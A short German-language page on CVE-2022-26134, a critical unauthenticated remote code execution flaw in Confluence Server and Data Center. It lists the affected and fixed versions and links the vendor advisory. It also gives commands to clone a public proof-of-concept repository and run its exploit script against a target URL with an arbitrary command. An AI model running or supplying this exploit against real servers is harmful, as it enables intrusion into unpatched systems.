
Confluence Server und Data Center - CVE-2022-26134 - Kritische Schwachstelle für nicht authentifizierte Remote-Codeausführung PoC
Confluence Server und Data Center - CVE-2022-26134 - Kritische Schwachstelle für nicht authentifizierte Remote-Codeausführung PoC

Atlassian stuft den Schweregrad dieser Schwachstelle als kritisch ein, gemäß der auf den Atlassian-Schweregradseiten veröffentlichten Skala. Alle Versionen von Confluence Server und Data Center vor den oben aufgeführten korrigierten Versionen sind von dieser Schwachstelle betroffen.
Die veröffentlichten Versionen 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 und 7.18.1 enthalten einen Fix für dieses Problem.
git clone https://github.com/shamo0/CVE-2022-26134.git
cd CVE-2022-26134
python3 exploit.py https://target.com CMD
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html